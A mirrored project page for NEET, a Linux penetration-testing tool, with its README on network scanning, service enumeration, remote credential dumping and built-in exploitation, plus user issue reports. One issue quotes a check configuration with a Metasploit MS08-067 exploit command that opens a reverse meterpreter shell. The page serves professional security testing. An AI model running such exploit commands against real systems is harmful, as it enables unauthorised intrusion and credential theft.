Coder Social home page Coder Social logo

neet's Introduction

NEET - Network Enumeration and Exploitation Tool

Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way.

Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories.

It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.

Neet has a simple and flexible command-line interface, and gathers a lot of data about the networks within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.

All the information gathered is stored in human-readable text files so they can be grepped and awked as the user sees fit and, as well as storing the raw data, Neet aggregates a lot of it into files of related information for easier processing.

There's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple commands. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live Windows hosts, and the testshares command checks for unauthenticated access to SMB shares.

There is also documentation. Check out the man pages, the help command inside the neet shell, and the HTML documentation in /opt/neet/doc. Also, please check out the project page for the latest news and issue tracking/feature requests.

In summary, Neet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain insight into the components, relationships and operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible.

Neet is released under version 3 of the GNU Public License. See the LICENSE file for details.

Copyright 2008-2016 Jonathan Roach Email: jonnyhightower [at] funkygeek.com

Some of the main features include:

Single interface to co-ordinate many tools;

Port scans and service identification are done in batches, so useful results appear early on;

Easy to specify ranges to include and exclude, both for IP addresses and ports;

Doesn't create more traffic than is strictly necessary;

Detailed, timestamped logging;

All raw tool output available, as well as sensibly-arranged output in text format;

Customisable speed and intensity;

Reliable scanning from multiple interfaces and over VPNs;

Scan control allows you to pause / resume the scan;

Cancel scans on individual hosts;

Monitor progress of the scanning;

Very configurable;

Neet shell (neetsh) is bash shell with many aliases for getting through results quickly;

Exploitation for specific exploits included in the Neet shell;

Dump credentials from remote hosts directly into your Neet results without manually shunting files and commands between machines;

Online incremental updates without having to do a full reinstall each time;

Documentation: man pages, HTML help and the help command in the Neet shell;

Many more.

** INSTALLATION **

Owing to the number of open-source tools orchestrated by Neet, the installation process will check the target system to ensure that it has the tools required. For the Debian, Ubuntu, Kali and Mint Linux distributions, the required prerequisites will be installed using APT prior to the main installation process.

See the INSTALL file for installation instructions.

neet's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

neet's Issues

Error installing on Kali

Hi,

I'm getting the following error while installing on Kali 2 (rolling):
Can't locate checkdeps.pm in @inc (you may need to install the checkdeps module) (@inc contains: /etc/perl /usr/local/lib/i386-linux-gnu/perl/5.24.1 /usr/local/share/perl/5.24.1 /usr/lib/i386-linux-gnu/perl5/5.24 /usr/share/perl5 /usr/lib/i386-linux-gnu/perl/5.24 /usr/share/perl/5.24 /usr/local/lib/site_perl /usr/lib/i386-linux-gnu/perl-base) at ./checkdeps.pl line 26.
BEGIN failed--compilation aborted at ./checkdeps.pl line 26.

I'm not a Perl whiz, but I see that the checkdeps.pm is on the same directory as the checkdeps.pl, so I don't know why it's not finding it...

Any ideas?

Error while trying to scan a single host

I try to scan a single host both with "-I" option and without it. After "Starting Service Discovery" neet exit with error:
Can't call method "contains" on an undefined value at /opt/neet/core/Neet/MainScan.pm line 974..
OS: Debian 8

NEET-UPDATE RUN

Neet-update run but has the same error:

Can't call method "contains" on an undefined value at /opt/neet/core/Neet/MainScan.pm line 974.

Doesn't cope with spaces in directory names

If you start Neet in a directory path that contains a space character, Neet exits with the error "Couldn't create the control directory!". Need to check that all directory references are quoted where relevant.

mainscan.pm

157 # Record interface information
158 my $if;
159 for my $line (/sbin/ifconfig -a){
160 if ($line =~ /^\w+\d+[.\d+]{0,}\s+Link[\s\S]+/){
161 $if=$line; $if =~ s/^(\w+\d+[.\d+]{0,})\s+Link[\s\S]+/$1/;
162 }
163 if ($line =~ /inet addr/){

On Debian the result of ifconfig is not the same, I had to replace line 163 to 'if ($line =~ /inet adr/){' to make it work.

ERROR: No configured network interfaces found. Exiting.

Hi, Jonney, after a successful installation of your tool on kali, it complains of not having a network interface configured with the following error code:
ERROR: No configured network interfaces found. Exiting.

Please what can i do to resolve this...

Feature Requests

  1. testssl.sh in the HTTPS/SSL modules
  2. Nmap RPC Grind in service discovery module

Metasplopit Checks

I know you are porting to msfconsole instead of msfcli. My question was regarding some of your checks. For example. I can see here that you are checking for MS08-067 but it seems you're also executing the exploit. Does Neet automatically exploit everything is finds vulnerable?

[CHECK]
name MS08-067 Server
label [GSM-WinVA-MS08-067]
desc Windows Server Service Remote Path Canonicalization Stack Overflow
type Windows
enabled 1

msref MS08-067
cve CVE-2008-4250
bid 31876

check [BIN]/ms08-067_check.py -s -t HOST 2>/dev/null
vuln VULNERABLE
#notest XP|2003
notest XP

exarch 32-bit
extype metasploit
exmancmd exploit/windows/smb/ms08_067_netapi RHOST=HOST LHOST=[LOCAL] TARGET=0 LPORT=[LOCALPORT] PAYLOA
D=windows/patchupmeterpreter/reverse_tcp E

exautosafe 0
exmanusafe 0

Also, Can I change where the information gets outputted? As in instead of having the folder where I ran Neet from full of folders containing a specific scan, could I just tell it to create a directory and dump the results of a specific scan into that folder. This will be easer for organizational purposes.

Thank You

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.